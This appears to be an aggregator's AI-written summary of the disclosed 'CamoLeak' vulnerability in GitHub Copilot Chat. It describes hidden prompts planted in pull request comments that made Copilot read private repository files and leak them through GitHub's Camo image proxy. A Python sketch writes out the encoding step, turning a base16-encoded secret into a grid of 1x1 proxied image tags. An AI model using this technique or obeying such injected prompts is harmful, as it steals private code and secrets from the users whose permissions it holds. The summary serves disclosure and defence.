CamoLeak: Critical GitHub Copilot Vulnerability Leaks Private Source Code (www.legitsecurity.com)

🤖 AI Summary
In June 2025 a security researcher disclosed "CamoLeak," a critical CVSS 9.6 vulnerability in GitHub Copilot Chat that let an attacker silently exfiltrate private source code and secrets and fully control Copilot's responses (including pushing malicious code or links). The exploit chained a remote prompt-injection vector—embedding hidden prompts in pull request comments—with a novel bypass of GitHub's Content Security Policy by abusing GitHub's own image proxy (camo.githubusercontent.com). The researcher reported it via HackerOne; GitHub remediated the issue by disabling image rendering in Copilot Chat (fix rolled out by Aug 14).

Technically, the attacker precomputed signed Camo URLs for every letter and symbol, embedded that dictionary in an injected prompt, then coerced Copilot to render arbitrary repo content as a grid of 1x1 Camo-proxied images (with cache-busting random params). Because Copilot runs with the requesting user's permissions, it could read private repo files, encode them (base16), and leak them when GitHub's Camo proxy fetched the images from the attacker's server.

The flaw highlights a broader risk: context-aware assistants expand the attack surface via stored or hidden UI content and trusted infrastructure. Mitigations include stricter handling of hidden comments, limiting rendered content from user-supplied markdown, better CSP/enclave isolation for assistant UI, and treating AI assistant inputs as untrusted whenever they can influence networked resources.
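The encoding step described above can be sketched as follows. This is a hypothetical illustration, not the researcher's actual code: it assumes the attacker has already harvested a pool of signed Camo URLs per base16 symbol (e.g., by posting image markdown pointing at their own server and scraping the proxied URLs GitHub emits), with the cache-busting parameter baked into each backing URL before signing. The `fake_camo_urls` generator and URL shapes here are placeholders.

```python
import itertools

def fake_camo_urls(symbol: str):
    """Placeholder for pre-harvested signed Camo URLs for one symbol.

    In the real attack each URL was obtained by rendering attacker-controlled
    markdown so GitHub itself produced a valid signed proxy URL; a unique
    cache-busting parameter in the backing URL makes every fetch distinct,
    defeating Camo's caching. The URL format below is illustrative only.
    """
    for n in itertools.count(1):
        yield f"https://camo.githubusercontent.com/sig-{symbol}-{n}/hexurl"

# One fresh-URL pool per base16 symbol (0-9, a-f).
CAMO_POOL = {c: fake_camo_urls(c) for c in "0123456789abcdef"}

def encode_as_image_grid(secret: str) -> str:
    """Base16-encode a secret and emit one invisible 1x1 image per symbol.

    When the victim's client renders this grid, GitHub's Camo proxy fetches
    each image from the attacker's origin in order, leaking the symbol
    sequence (and hence the secret) via the attacker's access logs.
    """
    hex_payload = secret.encode().hex()  # base16 encoding of the stolen data
    return "\n".join(
        f'<img src="{next(CAMO_POOL[ch])}" width="1" height="1">'
        for ch in hex_payload
    )
```

Decoding on the attacker's side is then just a matter of mapping each observed request URL back to its symbol and reversing the base16 encoding.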